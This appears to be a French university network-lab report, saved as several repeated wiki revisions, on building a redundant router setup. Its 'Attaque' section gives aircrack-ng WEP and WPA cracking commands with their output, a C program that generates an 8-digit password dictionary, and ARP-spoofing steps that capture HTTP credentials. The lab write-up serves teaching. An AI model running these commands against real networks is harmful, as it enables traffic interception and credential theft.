ensuite, on liste tous les paquets qui passent a vec la commande airodump en filtrant par le ssid de la craccote06 et le channel 9 qui est le channel ou se trouve la cracotte<br />
<br />
airodump-ng --bssid 04:DA:D2:9C:50:55 -c 9 -w log wlan0mon<br />
<br />
Avec la commande aircrack on decode la clef wep<br />
<br />
<br />
Aircrack-ng 1.5.2 <br />
[00:00:00] Tested 665 keys (got 99549 IVs)<br />
KB depth byte(vote)<br />
0 0/ 50 F1(124160) 6C(112640) BA(112384) B4(111872) 18(111104) <br />
1 6/ 1 32(110848) 28(109568) B5(109568) 11(109312) 52(109056) <br />
2 0/ 2 A3(137216) AB(113408) D7(112384) 84(111616) 52(110592) <br />
3 0/ 1 A3(137728) 7C(112896) 39(111872) 6B(111360) 10(111104) <br />
4 0/ 1 A3(145920) D8(118272) 57(116224) 28(113408) 86(111872) <br />
KEY FOUND! [ F1:DE:D4:00:00:00:00:00:00:00:99:99:99 ] <br />
Decrypted correctly: 100%<br />
<br />
<br />
<br />
==crackage Wpa==<br />
<br />
on effectue la meme procedure que pour la cle wep. Pour le decodage, on doit utiliser un dictionnaire de mots. Pour ce faire, on crée un petit programme en C qui va generer tous les mots de passes possibles qui sont sous la forme de 8 chifres :<br />
<br />
#include "stdio.h"<br />
#include "stdlib.h"<br />
int main(){<br />
int i=0;<br />
FILE* fichier=fopen("mdp","w+");<br />
for(i;i<=99999999;i++)<br />
{<br />
fprintf(fichier,"%08d\n",i);<br />
}<br />
fclose(fichier);<br />
}<br />
<br />
si besoin, pour accelerer le traitement, on peut partager la charge de travail sur plusieurs pc. pour ce faire, on utilise la commande split pour separer le fichier:<br />
split -b 200000000 mdp<br />
<br />
Pour transferer les fichier, on utilise la commande :<br />
scp mdp zabethXX:mdp<br />
<br />
on effectue la commande :<br />
aircrack-ng logWpa-02.cap -w mdp<br />
Cette commande va tester tous les mot de passes presents dans le fichier de mot de passe<br />
<br />
Aircrack-ng 1.5.2 <br />
[01:03:39] 20208040/102795810 keys tested (4001.16 k/s) <br />
Time left: 5 hours, 44 minutes, 1 second 19.66%<br />
KEY FOUND! [ 20133333 ]<br />
Master Key : F4 DD 26 3A CD 9D 73 68 4F C5 6E DC DF AD FF 63 <br />
A5 12 FB F0 66 F3 45 B0 30 44 24 53 CB 49 32 99 <br />
Transient Key : 69 E3 37 64 12 48 43 2A BA D3 DF 47 FE 11 1A 6B <br />
B0 4E 44 C4 72 8F EB B3 3F 9C 76 37 9F 34 89 C6 <br />
7D 9B 34 68 22 AE 38 91 51 55 6B 5D 2F 31 E9 69 <br />
E4 A5 9E CF 8B E7 EB 02 C7 44 4B AE 2A B4 7F 8E <br />
EAPOL HMAC : 89 DE EA B7 55 FF 34 D4 8A D5 C6 E1 E2 2F 80 93<br />
<br />
<br />
==attaque par homme du millieu==<br />
<br />
Cette attaque consiste a se faire passer pour le routeur et ainssi modifier les données qui transites<br />
<br />
pour ce faire il faut modifier le fichier /proc/sys/net/ipv4/ip_forward. On utilise la commande : <br />
echo 1 > /proc/sys/net/ipv4/ip_forward<br />
car ce fichier est un fichier specifique et il ne peut pas etre modifié avec des commandes classiques<br />
<br />
On modifie aussi les fichiers :<br />
echo 0 > /proc/sys/net/ipv4/conf/all/rp_filter<br />
echo 0 > /proc/sys/net/ipv4/conf/default/rp_filter<br />
<br />
On fait ensuite un ip r pour recuperer l'addresse ip du routeur et on envoie des reponces arp a notre cible avec la commande suivante :<br />
arpspoof -i bridge -t zabeth06 172.26.145.254<br />
<br />
bridge est l'interface que l'on utilise, zabeth06 est la cible et 172.26.145.254 est l'addresse du routeur.<br />
<br />
Le pc cible va recevoir des reponces arp et va changer ca table d'addressage en conciderant l'ordinateur attaquant comme son routeur. Il va donc envoyer ces requettes a ce dernier.<br />
<br />
Sur le pc attaquant, on peut utiliser wireschark avec comme filtre : </code>host zabeth06 and port http</code>. On vois alors toutes les connections de zabeth06 vers des sites http.<br />
<br />
En se connectant sur un site en http et donc non securisé, on peut visualiser l'ensemble des des communications entre l'ordinateur attaqué et les sites http comme les mots de passes<br />
<br />
Authorization: Basic T3VpIGp1fdghtrGIUG46546\r\n<br />
Non d'utilisateur : Oui le pas de calais<br />
Mdp : le mdp<br />
<br />
<br />
=instalation dns securisé=<br />
<br />
[[Fichier:pastabox.site-2020-11-13-08_50_33-UTC.png]]</div>Tvittecohttps://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2020/2021_G6&diff=53959TP sysres IMA2a5 2020/2021 G62020-11-20T11:11:00Z<p>Tvitteco : </p>
<hr />
<div>Ce rapport présente la mise en place d’un réseau redondé et la gestion de la sécurité<br />
<br />
[193.48.57.169]<br />
<br />
__TOC__<br />
==Partie commune==<br />
<br />
===Installation du 6509===<br />
<br />
Le routeur 6509 est un routeur que l'on peut modifier d'un point de vue hardware.<br />
<br />
On a donc dus installer le 6509 sur la baie et insérer les cartes superviseurs ainsi que les cartes d'entrées sorties.<br />
<br />
=== configuration 3560E ===<br />
La configuration du 3560E se fait via un port série et minicom<br />
<br />
Elle consiste a se connecter au Vlan130 afin d'avoir un accès au réseau polytech ainsi qu'a internet, et de créer 11 Vlan.<br />
Les Vlans:<br />
Le Vlan 1 permet la communication entres les trois routeurs de l'architecture<br />
Le Vlan 2 relie les routeurs au serveur capbreton qui héberge les machines virtuel<br />
Les Vlans 3 a 11 serons distribués entre les personnes pour crée des réseaux locaux individuels<br />
<br />
Les interfaces:<br />
L' interfaces 10Gbits 0/1 sont configurés en mode trunk pour la communication avec le 6509 via la fibre<br />
l'interface 0/5 est configurée sur le vlan 2 pour la communication avec capbreton en Ethernet<br />
l'interface 0/2 est configurée sur le vlan 2 pour la communication avec capbreton en Ethernet<br />
<br />
===Configuration de la redondance===<br />
<br />
Pour assurer la redondance des routeurs on utilise le logiciel ospf et on configure les métriques des routeurs(1 pour le routeur principal et 2 pour le routeur secondaire) afin de donner l'ordre de priorité des routeurs. Cette manipulation assure la redondance des serveurs en ipv4.<br />
<br />
Pour l'ipv6, la gestion de la redondance a été faite en configurant "nd router-preference" a high pour le 6509 et a low pour le 3560E. quant a l'interconnexion avec les internet, elle se fait avec les métriques comme dit précédemment.<br />
<br />
<br />
===Routeur virtuel===<br />
<br />
Les différentes machines virtuelles pressentes sur le Vlan 2 ont besoin, d'un routeur pour communiquer vers l'extérieur. Mais comme nous avons deux routeurs et que les VM ne peuvent en avoir qu'un, nous avons crée un routeur virtuel. Les VM envoient leurs paquets à l'adresses du routeur virtuel. Ces paquets sont alors envoyés par l'un ou l'autre des routeurs selon les routes que l'on a fixé.<br />
<br />
Pour fixer les routes, on a utiliser le HSRP de façon a ce que les communication passent en priorité sur le 6509 (si on ne fais pas cette manip les paquets sortent par le 3560E et reviennent par le 6509 ce qui peut poser des problèmes si l'un des deux routeurs tombe). On a donc installer HSRP sur les routeurs et on a définie la priorité du 6509 sur 120 et la priorité du 3506E sur 110. Les paquets passent dorénavant par le routeur qui a la plus haute priorité, ici le 6509.<br />
<br />
==Installation des VM==<br />
<br />
pastabox.site<br />
<br />
<br />
=Attaque=<br />
==crackage WEP==<br />
<br />
on utilise airmon pour configurer la che wiffi pour recevoir tous les paquets qui passent<br />
<br />
airmon-ng start wlx40a5ef0598a3<br />
<br />
On peut voir que le reseau a été renomé:<br />
<br />
root@zabeth07:~# airmon-ng<br />
PHY Interface Driver Chipset<br />
phy2 wlan0mon rt2800usb Ralink Technology, Corp. RT5370<br />
<br />
ensuite, on liste tous les paquets qui passent a vec la commande airodump en filtrant par le ssid de la craccote06 et le channel 9 qui est le channel ou se trouve la cracotte<br />
<br />
airodump-ng --bssid 04:DA:D2:9C:50:55 -c 9 -w log wlan0mon<br />
<br />
Avec la commande aircrack on decode la clef wep<br />
<br />
<br />
Aircrack-ng 1.5.2 <br />
[00:00:00] Tested 665 keys (got 99549 IVs)<br />
KB depth byte(vote)<br />
0 0/ 50 F1(124160) 6C(112640) BA(112384) B4(111872) 18(111104) <br />
1 6/ 1 32(110848) 28(109568) B5(109568) 11(109312) 52(109056) <br />
2 0/ 2 A3(137216) AB(113408) D7(112384) 84(111616) 52(110592) <br />
3 0/ 1 A3(137728) 7C(112896) 39(111872) 6B(111360) 10(111104) <br />
4 0/ 1 A3(145920) D8(118272) 57(116224) 28(113408) 86(111872) <br />
KEY FOUND! [ F1:DE:D4:00:00:00:00:00:00:00:99:99:99 ] <br />
Decrypted correctly: 100%<br />
<br />
<br />
<br />
==crackage Wpa==<br />
<br />
on effectue la meme procedure que pour la cle wep. Pour le decodage, on doit utiliser un dictionnaire de mots. Pour ce faire, on crée un petit programme en C qui va generer tous les mots de passes possibles qui sont sous la forme de 8 chifres :<br />
<br />
#include "stdio.h"<br />
#include "stdlib.h"<br />
int main(){<br />
int i=0;<br />
FILE* fichier=fopen("mdp","w+");<br />
for(i;i<=99999999;i++)<br />
{<br />
fprintf(fichier,"%08d\n",i);<br />
}<br />
fclose(fichier);<br />
}<br />
<br />
si besoin, pour accelerer le traitement, on peut partager la charge de travail sur plusieurs pc. pour ce faire, on utilise la commande split pour separer le fichier:<br />
split -b 200000000 mdp<br />
<br />
Pour transferer les fichier, on utilise la commande :<br />
scp mdp zabethXX:mdp<br />
<br />
on effectue la commande :<br />
aircrack-ng logWpa-02.cap -w mdp<br />
Cette commande va tester tous les mot de passes presents dans le fichier de mot de passe<br />
<br />
Aircrack-ng 1.5.2 <br />
[01:03:39] 20208040/102795810 keys tested (4001.16 k/s) <br />
Time left: 5 hours, 44 minutes, 1 second 19.66%<br />
KEY FOUND! [ 20133333 ]<br />
Master Key : F4 DD 26 3A CD 9D 73 68 4F C5 6E DC DF AD FF 63 <br />
A5 12 FB F0 66 F3 45 B0 30 44 24 53 CB 49 32 99 <br />
Transient Key : 69 E3 37 64 12 48 43 2A BA D3 DF 47 FE 11 1A 6B <br />
B0 4E 44 C4 72 8F EB B3 3F 9C 76 37 9F 34 89 C6 <br />
7D 9B 34 68 22 AE 38 91 51 55 6B 5D 2F 31 E9 69 <br />
E4 A5 9E CF 8B E7 EB 02 C7 44 4B AE 2A B4 7F 8E <br />
EAPOL HMAC : 89 DE EA B7 55 FF 34 D4 8A D5 C6 E1 E2 2F 80 93<br />
<br />
<br />
==attaque par homme du millieu==<br />
<br />
Cette attaque consiste a se faire passer pour le routeur et ainssi modifier les données qui transites<br />
<br />
pour ce faire il faut modifier le fichier /proc/sys/net/ipv4/ip_forward. On utilise la commande : <br />
echo 1 > /proc/sys/net/ipv4/ip_forward<br />
car ce fichier est un fichier specifique et il ne peut pas etre modifié avec des commandes classiques<br />
<br />
On modifie aussi les fichiers :<br />
echo 0 > /proc/sys/net/ipv4/conf/all/rp_filter<br />
echo 0 > /proc/sys/net/ipv4/conf/default/rp_filter<br />
<br />
On fait ensuite un ip r pour recuperer l'addresse ip du routeur et on envoie des reponces arp a notre cible avec la commande suivante :<br />
arpspoof -i bridge -t zabeth06 172.26.145.254<br />
<br />
bridge est l'interface que l'on utilise, zabeth06 est la cible et 172.26.145.254 est l'addresse du routeur.<br />
<br />
Le pc cible va recevoir des reponces arp et va changer ca table d'addressage en conciderant l'ordinateur attaquant comme son routeur. Il va donc envoyer ces requettes a ce dernier.<br />
<br />
Sur le pc attaquant, on peut utiliser wireschark avec comme filtre : </code>host zabeth06 and port http</code>. On vois alors toutes les connections de zabeth06 vers des sites http.<br />
<br />
En se connectant sur un site en http et donc non securisé, on peut visualiser l'ensemble des des communications entre l'ordinateur attaqué et les sites http comme les mots de passes<br />
<br />
Authorization: Basic T3VpIGp1fdghtrGIUG46546\r\n<br />
Non d'utilisateur : Oui le pas de calais<br />
Mdp : le mdp<br />
<br />
<br />
=instalation dns securisé=<br />
<br />
[[Fichier:pastabox.site-2020-11-13-08_50_33-UTC.png]]</div>Tvittecohttps://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2020/2021_G6&diff=53958TP sysres IMA2a5 2020/2021 G62020-11-20T11:10:39Z<p>Tvitteco : </p>
<hr />
<div>Ce rapport présente la mise en place d’un réseau redondé et la gestion de la sécurité<br />
<br />
[pastabox.site]<br />
<br />
__TOC__<br />
==Partie commune==<br />
<br />
===Installation du 6509===<br />
<br />
Le routeur 6509 est un routeur que l'on peut modifier d'un point de vue hardware.<br />
<br />
On a donc dus installer le 6509 sur la baie et insérer les cartes superviseurs ainsi que les cartes d'entrées sorties.<br />
<br />
=== configuration 3560E ===<br />
La configuration du 3560E se fait via un port série et minicom<br />
<br />
Elle consiste a se connecter au Vlan130 afin d'avoir un accès au réseau polytech ainsi qu'a internet, et de créer 11 Vlan.<br />
Les Vlans:<br />
Le Vlan 1 permet la communication entres les trois routeurs de l'architecture<br />
Le Vlan 2 relie les routeurs au serveur capbreton qui héberge les machines virtuel<br />
Les Vlans 3 a 11 serons distribués entre les personnes pour crée des réseaux locaux individuels<br />
<br />
Les interfaces:<br />
L' interfaces 10Gbits 0/1 sont configurés en mode trunk pour la communication avec le 6509 via la fibre<br />
l'interface 0/5 est configurée sur le vlan 2 pour la communication avec capbreton en Ethernet<br />
l'interface 0/2 est configurée sur le vlan 2 pour la communication avec capbreton en Ethernet<br />
<br />
===Configuration de la redondance===<br />
<br />
Pour assurer la redondance des routeurs on utilise le logiciel ospf et on configure les métriques des routeurs(1 pour le routeur principal et 2 pour le routeur secondaire) afin de donner l'ordre de priorité des routeurs. Cette manipulation assure la redondance des serveurs en ipv4.<br />
<br />
Pour l'ipv6, la gestion de la redondance a été faite en configurant "nd router-preference" a high pour le 6509 et a low pour le 3560E. quant a l'interconnexion avec les internet, elle se fait avec les métriques comme dit précédemment.<br />
<br />
<br />
===Routeur virtuel===<br />
<br />
Les différentes machines virtuelles pressentes sur le Vlan 2 ont besoin, d'un routeur pour communiquer vers l'extérieur. Mais comme nous avons deux routeurs et que les VM ne peuvent en avoir qu'un, nous avons crée un routeur virtuel. Les VM envoient leurs paquets à l'adresses du routeur virtuel. Ces paquets sont alors envoyés par l'un ou l'autre des routeurs selon les routes que l'on a fixé.<br />
<br />
Pour fixer les routes, on a utiliser le HSRP de façon a ce que les communication passent en priorité sur le 6509 (si on ne fais pas cette manip les paquets sortent par le 3560E et reviennent par le 6509 ce qui peut poser des problèmes si l'un des deux routeurs tombe). On a donc installer HSRP sur les routeurs et on a définie la priorité du 6509 sur 120 et la priorité du 3506E sur 110. Les paquets passent dorénavant par le routeur qui a la plus haute priorité, ici le 6509.<br />
<br />
==Installation des VM==<br />
<br />
pastabox.site<br />
<br />
<br />
=Attaque=<br />
==crackage WEP==<br />
<br />
on utilise airmon pour configurer la che wiffi pour recevoir tous les paquets qui passent<br />
<br />
airmon-ng start wlx40a5ef0598a3<br />
<br />
On peut voir que le reseau a été renomé:<br />
<br />
root@zabeth07:~# airmon-ng<br />
PHY Interface Driver Chipset<br />
phy2 wlan0mon rt2800usb Ralink Technology, Corp. RT5370<br />
<br />
ensuite, on liste tous les paquets qui passent a vec la commande airodump en filtrant par le ssid de la craccote06 et le channel 9 qui est le channel ou se trouve la cracotte<br />
<br />
airodump-ng --bssid 04:DA:D2:9C:50:55 -c 9 -w log wlan0mon<br />
<br />
Avec la commande aircrack on decode la clef wep<br />
<br />
<br />
Aircrack-ng 1.5.2 <br />
[00:00:00] Tested 665 keys (got 99549 IVs)<br />
KB depth byte(vote)<br />
0 0/ 50 F1(124160) 6C(112640) BA(112384) B4(111872) 18(111104) <br />
1 6/ 1 32(110848) 28(109568) B5(109568) 11(109312) 52(109056) <br />
2 0/ 2 A3(137216) AB(113408) D7(112384) 84(111616) 52(110592) <br />
3 0/ 1 A3(137728) 7C(112896) 39(111872) 6B(111360) 10(111104) <br />
4 0/ 1 A3(145920) D8(118272) 57(116224) 28(113408) 86(111872) <br />
KEY FOUND! [ F1:DE:D4:00:00:00:00:00:00:00:99:99:99 ] <br />
Decrypted correctly: 100%<br />
<br />
<br />
<br />
==crackage Wpa==<br />
<br />
on effectue la meme procedure que pour la cle wep. Pour le decodage, on doit utiliser un dictionnaire de mots. Pour ce faire, on crée un petit programme en C qui va generer tous les mots de passes possibles qui sont sous la forme de 8 chifres :<br />
<br />
#include "stdio.h"<br />
#include "stdlib.h"<br />
int main(){<br />
int i=0;<br />
FILE* fichier=fopen("mdp","w+");<br />
for(i;i<=99999999;i++)<br />
{<br />
fprintf(fichier,"%08d\n",i);<br />
}<br />
fclose(fichier);<br />
}<br />
<br />
si besoin, pour accelerer le traitement, on peut partager la charge de travail sur plusieurs pc. pour ce faire, on utilise la commande split pour separer le fichier:<br />
split -b 200000000 mdp<br />
<br />
Pour transferer les fichier, on utilise la commande :<br />
scp mdp zabethXX:mdp<br />
<br />
on effectue la commande :<br />
aircrack-ng logWpa-02.cap -w mdp<br />
Cette commande va tester tous les mot de passes presents dans le fichier de mot de passe<br />
<br />
Aircrack-ng 1.5.2 <br />
[01:03:39] 20208040/102795810 keys tested (4001.16 k/s) <br />
Time left: 5 hours, 44 minutes, 1 second 19.66%<br />
KEY FOUND! [ 20133333 ]<br />
Master Key : F4 DD 26 3A CD 9D 73 68 4F C5 6E DC DF AD FF 63 <br />
A5 12 FB F0 66 F3 45 B0 30 44 24 53 CB 49 32 99 <br />
Transient Key : 69 E3 37 64 12 48 43 2A BA D3 DF 47 FE 11 1A 6B <br />
B0 4E 44 C4 72 8F EB B3 3F 9C 76 37 9F 34 89 C6 <br />
7D 9B 34 68 22 AE 38 91 51 55 6B 5D 2F 31 E9 69 <br />
E4 A5 9E CF 8B E7 EB 02 C7 44 4B AE 2A B4 7F 8E <br />
EAPOL HMAC : 89 DE EA B7 55 FF 34 D4 8A D5 C6 E1 E2 2F 80 93<br />
<br />
<br />
==attaque par homme du millieu==<br />
<br />
Cette attaque consiste a se faire passer pour le routeur et ainssi modifier les données qui transites<br />
<br />
pour ce faire il faut modifier le fichier /proc/sys/net/ipv4/ip_forward. On utilise la commande : <br />
echo 1 > /proc/sys/net/ipv4/ip_forward<br />
car ce fichier est un fichier specifique et il ne peut pas etre modifié avec des commandes classiques<br />
<br />
On modifie aussi les fichiers :<br />
echo 0 > /proc/sys/net/ipv4/conf/all/rp_filter<br />
echo 0 > /proc/sys/net/ipv4/conf/default/rp_filter<br />
<br />
On fait ensuite un ip r pour recuperer l'addresse ip du routeur et on envoie des reponces arp a notre cible avec la commande suivante :<br />
arpspoof -i bridge -t zabeth06 172.26.145.254<br />
<br />
bridge est l'interface que l'on utilise, zabeth06 est la cible et 172.26.145.254 est l'addresse du routeur.<br />
<br />
Le pc cible va recevoir des reponces arp et va changer ca table d'addressage en conciderant l'ordinateur attaquant comme son routeur. Il va donc envoyer ces requettes a ce dernier.<br />
<br />
Sur le pc attaquant, on peut utiliser wireschark avec comme filtre : </code>host zabeth06 and port http</code>. On vois alors toutes les connections de zabeth06 vers des sites http.<br />
<br />
En se connectant sur un site en http et donc non securisé, on peut visualiser l'ensemble des des communications entre l'ordinateur attaqué et les sites http comme les mots de passes<br />
<br />
Authorization: Basic T3VpIGp1fdghtrGIUG46546\r\n<br />
Non d'utilisateur : Oui le pas de calais<br />
Mdp : le mdp<br />
<br />
<br />
=instalation dns securisé=<br />
<br />
[[Fichier:pastabox.site-2020-11-13-08_50_33-UTC.png]]</div>Tvittecohttps://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2020/2021_G6&diff=53565TP sysres IMA2a5 2020/2021 G62020-11-13T09:41:17Z<p>Tvitteco : </p>
<hr />
<div>Ce rapport présente la mise en place d’un réseau redondé et la gestion de la sécurité<br />
<br />
__TOC__<br />
=test=<br />
==Partie commune==<br />
<br />
===Installation du 6509===<br />
<br />
Le routeur 6509 est un routeur que l'on peut modifier d'un point de vue hardware.<br />
<br />
On a donc dus installer le 6509 sur la baie et insérer les cartes superviseurs ainsi que les cartes d'entrées sorties.<br />
<br />
=== configuration 3560E ===<br />
La configuration du 3560E se fait via un port série et minicom<br />
<br />
Elle consiste a se connecter au Vlan130 afin d'avoir un accès au réseau polytech ainsi qu'a internet, et de créer 11 Vlan.<br />
Les Vlans:<br />
Le Vlan 1 permet la communication entres les trois routeurs de l'architecture<br />
Le Vlan 2 relie les routeurs au serveur capbreton qui héberge les machines virtuel<br />
Les Vlans 3 a 11 serons distribués entre les personnes pour crée des réseaux locaux individuels<br />
<br />
Les interfaces:<br />
L' interfaces 10Gbits 0/1 sont configurés en mode trunk pour la communication avec le 6509 via la fibre<br />
l'interface 0/5 est configurée sur le vlan 2 pour la communication avec capbreton en Ethernet<br />
l'interface 0/2 est configurée sur le vlan 2 pour la communication avec capbreton en Ethernet<br />
<br />
===Configuration de la redondance===<br />
<br />
Pour assurer la redondance des routeurs on utilise le logiciel ospf et on configure les métriques des routeurs(1 pour le routeur principal et 2 pour le routeur secondaire) afin de donner l'ordre de priorité des routeurs. Cette manipulation assure la redondance des serveurs en ipv4.<br />
<br />
Pour l'ipv6, la gestion de la redondance a été faite en configurant "nd router-preference" a high pour le 6509 et a low pour le 3560E. quant a l'interconnexion avec les internet, elle se fait avec les métriques comme dit précédemment.<br />
<br />
<br />
===Routeur virtuel===<br />
<br />
Les différentes machines virtuelles pressentes sur le Vlan 2 ont besoin, d'un routeur pour communiquer vers l'extérieur. Mais comme nous avons deux routeurs et que les VM ne peuvent en avoir qu'un, nous avons crée un routeur virtuel. Les VM envoient leurs paquets à l'adresses du routeur virtuel. Ces paquets sont alors envoyés par l'un ou l'autre des routeurs selon les routes que l'on a fixé.<br />
<br />
Pour fixer les routes, on a utiliser le HSRP de façon a ce que les communication passent en priorité sur le 6509 (si on ne fais pas cette manip les paquets sortent par le 3560E et reviennent par le 6509 ce qui peut poser des problèmes si l'un des deux routeurs tombe). On a donc installer HSRP sur les routeurs et on a définie la priorité du 6509 sur 120 et la priorité du 3506E sur 110. Les paquets passent dorénavant par le routeur qui a la plus haute priorité, ici le 6509.<br />
<br />
==Installation des VM==<br />
<br />
pastabox.site<br />
<br />
<br />
=Attaque=<br />
==crackage WEP==<br />
<br />
on utilise airmon pour configurer la che wiffi pour recevoir tous les paquets qui passent<br />
<br />
airmon-ng start wlx40a5ef0598a3<br />
<br />
On peut voir que le reseau a été renomé:<br />
<br />
root@zabeth07:~# airmon-ng<br />
PHY Interface Driver Chipset<br />
phy2 wlan0mon rt2800usb Ralink Technology, Corp. RT5370<br />
<br />
ensuite, on liste tous les paquets qui passent a vec la commande airodump en filtrant par le ssid de la craccote06 et le channel 9 qui est le channel ou se trouve la cracotte<br />
<br />
airodump-ng --bssid 04:DA:D2:9C:50:55 -c 9 -w log wlan0mon<br />
<br />
Avec la commande aircrack on decode la clef wep<br />
<br />
<br />
Aircrack-ng 1.5.2 <br />
[00:00:00] Tested 665 keys (got 99549 IVs)<br />
KB depth byte(vote)<br />
0 0/ 50 F1(124160) 6C(112640) BA(112384) B4(111872) 18(111104) <br />
1 6/ 1 32(110848) 28(109568) B5(109568) 11(109312) 52(109056) <br />
2 0/ 2 A3(137216) AB(113408) D7(112384) 84(111616) 52(110592) <br />
3 0/ 1 A3(137728) 7C(112896) 39(111872) 6B(111360) 10(111104) <br />
4 0/ 1 A3(145920) D8(118272) 57(116224) 28(113408) 86(111872) <br />
KEY FOUND! [ F1:DE:D4:00:00:00:00:00:00:00:99:99:99 ] <br />
Decrypted correctly: 100%<br />
<br />
<br />
<br />
==crackage Wpa==<br />
<br />
on effectue la meme procedure que pour la cle wep. Pour le decodage, on doit utiliser un dictionnaire de mots. Pour ce faire, on crée un petit programme en C qui va generer tous les mots de passes possibles qui sont sous la forme de 8 chifres :<br />
<br />
#include "stdio.h"<br />
#include "stdlib.h"<br />
int main(){<br />
int i=0;<br />
FILE* fichier=fopen("mdp","w+");<br />
for(i;i<=99999999;i++)<br />
{<br />
fprintf(fichier,"%08d\n",i);<br />
}<br />
fclose(fichier);<br />
}<br />
<br />
si besoin, pour accelerer le traitement, on peut partager la charge de travail sur plusieurs pc. pour ce faire, on utilise la commande split pour separer le fichier:<br />
split -b 200000000 mdp<br />
<br />
Pour transferer les fichier, on utilise la commande :<br />
scp mdp zabethXX:mdp<br />
<br />
on effectue la commande :<br />
aircrack-ng logWpa-02.cap -w mdp<br />
Cette commande va tester tous les mot de passes presents dans le fichier de mot de passe<br />
<br />
Aircrack-ng 1.5.2 <br />
[01:03:39] 20208040/102795810 keys tested (4001.16 k/s) <br />
Time left: 5 hours, 44 minutes, 1 second 19.66%<br />
KEY FOUND! [ 20133333 ]<br />
Master Key : F4 DD 26 3A CD 9D 73 68 4F C5 6E DC DF AD FF 63 <br />
A5 12 FB F0 66 F3 45 B0 30 44 24 53 CB 49 32 99 <br />
Transient Key : 69 E3 37 64 12 48 43 2A BA D3 DF 47 FE 11 1A 6B <br />
B0 4E 44 C4 72 8F EB B3 3F 9C 76 37 9F 34 89 C6 <br />
7D 9B 34 68 22 AE 38 91 51 55 6B 5D 2F 31 E9 69 <br />
E4 A5 9E CF 8B E7 EB 02 C7 44 4B AE 2A B4 7F 8E <br />
EAPOL HMAC : 89 DE EA B7 55 FF 34 D4 8A D5 C6 E1 E2 2F 80 93<br />
<br />
<br />
==attaque par homme du millieu==<br />
<br />
Cette attaque consiste a se faire passer pour le routeur et ainssi modifier les données qui transites<br />
<br />
pour ce faire il faut modifier le fichier /proc/sys/net/ipv4/ip_forward. On utilise la commande : <br />
echo 1 > /proc/sys/net/ipv4/ip_forward<br />
car ce fichier est un fichier specifique et il ne peut pas etre modifié avec des commandes classiques<br />
<br />
On modifie aussi les fichiers :<br />
echo 0 > /proc/sys/net/ipv4/conf/all/rp_filter<br />
echo 0 > /proc/sys/net/ipv4/conf/default/rp_filter<br />
<br />
On fait ensuite un ip r pour recuperer l'addresse ip du routeur et on envoie des reponces arp a notre cible avec la commande suivante :<br />
arpspoof -i bridge -t zabeth06 172.26.145.254<br />
<br />
bridge est l'interface que l'on utilise, zabeth06 est la cible et 172.26.145.254 est l'addresse du routeur.<br />
<br />
Le pc cible va recevoir des reponces arp et va changer ca table d'addressage en conciderant l'ordinateur attaquant comme son routeur. Il va donc envoyer ces requettes a ce dernier.<br />
<br />
Sur le pc attaquant, on peut utiliser wireschark avec comme filtre : </code>host zabeth06 and port http</code>. On vois alors toutes les connections de zabeth06 vers des sites http.<br />
<br />
En se connectant sur un site en http et donc non securisé, on peut visualiser l'ensemble des des communications entre l'ordinateur attaqué et les sites http comme les mots de passes<br />
<br />
Authorization: Basic T3VpIGp1fdghtrGIUG46546\r\n<br />
Non d'utilisateur : Oui le pas de calais<br />
Mdp : le mdp<br />
<br />
<br />
=instalation dns securisé=<br />
<br />
[[Fichier:pastabox.site-2020-11-13-08_50_33-UTC.png]]</div>Tvittecohttps://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2020/2021_G6&diff=53564TP sysres IMA2a5 2020/2021 G62020-11-13T09:39:54Z<p>Tvitteco : </p>
<hr />
<div>Ce rapport présente la mise en place d’un réseau redondé et la gestion de la sécurité<br />
<br />
__TOC__<br />
=test=<br />
==Partie commune==<br />
<br />
===Installation du 6509===<br />
<br />
Le routeur 6509 est un routeur que l'on peut modifier d'un point de vue hardware.<br />
<br />
On a donc dus installer le 6509 sur la baie et insérer les cartes superviseurs ainsi que les cartes d'entrées sorties.<br />
<br />
=== configuration 3560E ===<br />
La configuration du 3560E se fait via un port série et minicom<br />
<br />
Elle consiste a se connecter au Vlan130 afin d'avoir un accès au réseau polytech ainsi qu'a internet, et de créer 11 Vlan.<br />
Les Vlans:<br />
Le Vlan 1 permet la communication entres les trois routeurs de l'architecture<br />
Le Vlan 2 relie les routeurs au serveur capbreton qui héberge les machines virtuel<br />
Les Vlans 3 a 11 serons distribués entre les personnes pour crée des réseaux locaux individuels<br />
<br />
Les interfaces:<br />
L' interfaces 10Gbits 0/1 sont configurés en mode trunk pour la communication avec le 6509 via la fibre<br />
l'interface 0/5 est configurée sur le vlan 2 pour la communication avec capbreton en Ethernet<br />
l'interface 0/2 est configurée sur le vlan 2 pour la communication avec capbreton en Ethernet<br />
<br />
===Configuration de la redondance===<br />
<br />
Pour assurer la redondance des routeurs on utilise le logiciel ospf et on configure les métriques des routeurs(1 pour le routeur principal et 2 pour le routeur secondaire) afin de donner l'ordre de priorité des routeurs. Cette manipulation assure la redondance des serveurs en ipv4.<br />
<br />
Pour l'ipv6, la gestion de la redondance a été faite en configurant "nd router-preference" a high pour le 6509 et a low pour le 3560E. quant a l'interconnexion avec les internet, elle se fait avec les métriques comme dit précédemment.<br />
<br />
<br />
===Routeur virtuel===<br />
<br />
Les différentes machines virtuelles pressentes sur le Vlan 2 ont besoin, d'un routeur pour communiquer vers l'extérieur. Mais comme nous avons deux routeurs et que les VM ne peuvent en avoir qu'un, nous avons crée un routeur virtuel. Les VM envoient leurs paquets à l'adresses du routeur virtuel. Ces paquets sont alors envoyés par l'un ou l'autre des routeurs selon les routes que l'on a fixé.<br />
<br />
Pour fixer les routes, on a utiliser le HSRP de façon a ce que les communication passent en priorité sur le 6509 (si on ne fais pas cette manip les paquets sortent par le 3560E et reviennent par le 6509 ce qui peut poser des problèmes si l'un des deux routeurs tombe). On a donc installer HSRP sur les routeurs et on a définie la priorité du 6509 sur 120 et la priorité du 3506E sur 110. Les paquets passent dorénavant par le routeur qui a la plus haute priorité, ici le 6509.<br />
<br />
==Installation des VM==<br />
<br />
pastabox.site<br />
<br />
<br />
=Attaque=<br />
==crackage WEP==<br />
<br />
on utilise airmon pour configurer la che wiffi pour recevoir tous les paquets qui passent<br />
<br />
airmon-ng start wlx40a5ef0598a3<br />
<br />
On peut voir que le reseau a été renomé:<br />
<br />
root@zabeth07:~# airmon-ng<br />
PHY Interface Driver Chipset<br />
phy2 wlan0mon rt2800usb Ralink Technology, Corp. RT5370<br />
